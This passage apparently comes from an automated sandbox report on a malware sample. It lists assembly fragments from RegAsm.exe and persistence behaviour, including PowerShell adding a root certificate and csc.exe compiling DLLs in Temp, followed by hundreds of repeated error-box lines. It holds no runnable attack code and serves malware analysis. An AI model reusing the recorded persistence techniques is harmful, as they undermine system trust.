            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB60 pushad ; retf 44_2_00F2CB61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C364 pushad ; ret 44_2_00F2C365
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB64 pushad ; retf 44_2_00F2CB65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C368 push 6800F2C3h; ret 44_2_00F2C36D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB68 push 6800F2CBh; retf 44_2_00F2CB6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C350 push eax; ret 44_2_00F2C351
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB50 push eax; retf 44_2_00F2CB51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C354 push eax; ret 44_2_00F2C355
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB54 push eax; retf 44_2_00F2CB55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00437069 push es; retf 45_2_00437074
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043C990 push eax; mov dword ptr [esp], 5C5D5E5Fh 45_2_0043C99E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041B324 push F3B90044h; retf 45_2_0041B32A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00445C05 push ds; iretd 45_2_00445C08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0044856B push cs; retf 45_2_0044856C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 49_2_00D9B01A push ecx; retf 49_2_00D9B040

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
